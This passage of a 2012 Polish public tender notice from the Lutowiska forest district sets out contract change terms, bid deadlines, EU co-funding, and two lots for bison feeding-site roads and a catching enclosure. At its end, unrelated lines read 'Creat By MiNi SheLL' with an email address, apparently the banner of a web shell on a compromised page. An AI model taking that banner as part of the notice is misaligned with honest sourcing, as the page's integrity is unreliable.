                umowy nie leży w interesie publicznym, czego nie można było przewidzieć  
                w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w  
                terminie 30  dni od powzięcia wiadomości o tych okolicznościach. 
wg pkt. 16.6. SIWZ. zmiany terminu realizacji spowodowanej: 
a)   wystąpieniem warunków atmosferycznych mających wpływ na brak możliwości lub utrudnienie wykonywania umowy, np. długotrwałe intensywne opady powodujące konieczność przerwania robót lub opóźniające ich rozpoczęcie,
b) zmianami wynikającymi ze zmian przepisów prawa, norm, standardów, wiedzy technicznej, warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi, ochrony środowiska, itp., 
c) okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy,
d) okolicznościami leżącymi po stronie Zamawiającego,

e) okolicznościami będącymi następstwem działania organów administracji i innych podmiotów trzecich, a także działania siły wyższej,
        f) przyczyn zewnętrznych niezależnych od zamawiającego oraz wykonawcy  
 skutkujących niemożliwością prowadzenia działań w celu wykonania umowy.

wg. pkt. 16.7. SIWZ zmiany wynagrodzenia w przypadku zmian stawki podatku VAT, wynikających z  obowiązujących w tym zakresie przepisów.
wg pkt. 16.8. SIWZ. zmiany wynagrodzenia umownego w przypadku ograniczenia zakresu 
         przedmiotowego umowy.

Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
            Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy oraz nie mogą powodować obejścia przepisu art. 144 ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lutowiska/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Lutowiska
38-713  Lutowiska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 14:00, miejsce: Siedzibie Zamawiającego- Sekretariat
Nadleśnictwo Lutowiska
38-713  Lutowiska 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje że, przedmiot niniejszego zamówienia będzie współfinansowany ze środków EFRR (Europejski Fundusz Rozwoju Regionalnego) oraz NFOŚiGW (Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej) w ramach Programu Operacyjnego Infrastruktura i Środowisko - Priorytet: V: Ochrona przyrody i kształtowanie postaw ekologicznych. Działanie: 5.1 Wspieranie kompleksowych projektów z zakresu ochrony siedlisk przyrodniczych (ekosystemów) na obszarach chronionych oraz zachowanie różnorodności gatunkowej.

Pkt. 2. SIWZ. Tryb udzielenia zamówienia
Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst ujednolicony Dz. U. z 2010r.  nr 113, poz. 759  z późn. zm.), zwanej dalej ustawą oraz w sprawach nieuregulowanych ustawą, przepisy ustawy - Kodeks cywilny.
Postępowanie jest prowadzone w trybie przetargu nieograniczonego na podstawie art. 39 - 46 ustawy. 
Zamówienie na roboty budowlane jest o wartości mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8  ustawy
Pkt.3.5. SIWZ. Informacje o ofercie wariantowej, umowie ramowej i aukcji elektronicznej:
     - Zamawiający nie dopuszcza składania ofert wariantowych,
     - Zamawiający nie przewiduje zawarcia umowy ramowej,
     - Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem    
        aukcji elektronicznej ani utworzenia dynamicznego systemu zakupów.


Pkt.3.6. SIWZ. Zamówienia częściowe.
      Zamawiający  dopuszcza składania ofert częściowych.
      Ofertę można złożyć na jedną lub więcej części.


Pkt.18. SIWZ Inne postanowienia SIWZ:

18.1. Zamawiający nie przewiduje możliwość udzielania zamówień uzupełniających.
18.2. Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w 
         walucie polskiej.
18.3. Zamawiający żąda wskazania przez Wykonawcę o  ofercie części zamówienia, 
         której wykonanie powierzy podwykonawcom.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dojazdy do miejsc dokarmiania i odłowni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wykonanie dojazdów do miejsc dokarmiania żubrów oraz poprawienie istniejącego dojazdu do odłowni.
Prace polegają na utwardzeniu istniejących szlaków zrywkowych poprzez wsypanie tłucznia w koleiny i zagęszczenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa odłowni  o powierzchnia 0,50 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa odłowni  o powierzchnia 0,50 ha..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com